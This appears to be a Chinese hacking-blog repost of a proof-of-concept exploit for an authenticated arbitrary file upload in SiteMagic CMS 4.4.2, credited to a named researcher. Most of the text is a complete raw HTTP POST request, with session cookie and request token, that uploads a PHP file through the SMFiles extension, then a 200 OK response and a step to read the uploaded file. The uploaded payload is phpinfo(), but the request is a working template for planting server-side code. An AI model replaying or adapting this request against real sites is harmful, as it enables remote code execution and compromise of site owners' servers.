SiteMagic CMS 4.4.2-任意文件上传(已认证)漏洞—Hack之路

SiteMagic CMS 4.4.2-任意文件上传(已认证)漏洞
#利用作者:v1n1v131r4
#供应商主页:https://sitemagic.org/
#软件链接:https://sitemagic.org/Download.html
#版本:4.4.2
#测试于:Ubuntu 18.04
#CVE:不适用
#PoC:https://github.com/V1n1v131r4/Unrestricted-File-Upload-on-SiteMagic-CMS-4.4.2/blob/master/README.md

POST /sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-BR,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------144837887339078243581158835832
Content-Length: 538
Origin: example.org
DNT: 1
Connection: close
Cookie: timezone=America/Argentina/Buenos_Aires; cookieconsent_status=dismiss; SMSESSION407f70d0a9400582=f93d614ad0046ec76e41f3613d97da59
Upgrade-Insecure-Requests: 1
-----------------------------144837887339078243581158835832
Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="info.php"
Content-Type: application/x-php
<?php phpinfo(); ?>
-----------------------------144837887339078243581158835832
Content-Disposition: form-data; name="SMPostBackControl"
-----------------------------144837887339078243581158835832
Content-Disposition: form-data; name="SMRequestToken"
f9f116f33c012ce5e67f52dffc7e6bc6
-----------------------------144837887339078243581158835832--
Step 2 - Response
Status 200 OK
Version HTTP/1.1
Transferred 26,20 KB (25,80 KB size)
Referrer Policy no-referrer-when-downgrade
Step 3 - Read file uploaded

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/14/sitemagic-cms-4-4-2-%e4%bb%bb%e6%84%8f%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0%ef%bc%88%e5%b7%b2%e8%ae%a4%e8%af%81%ef%bc%89%e6%bc%8f%e6%b4%9e-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注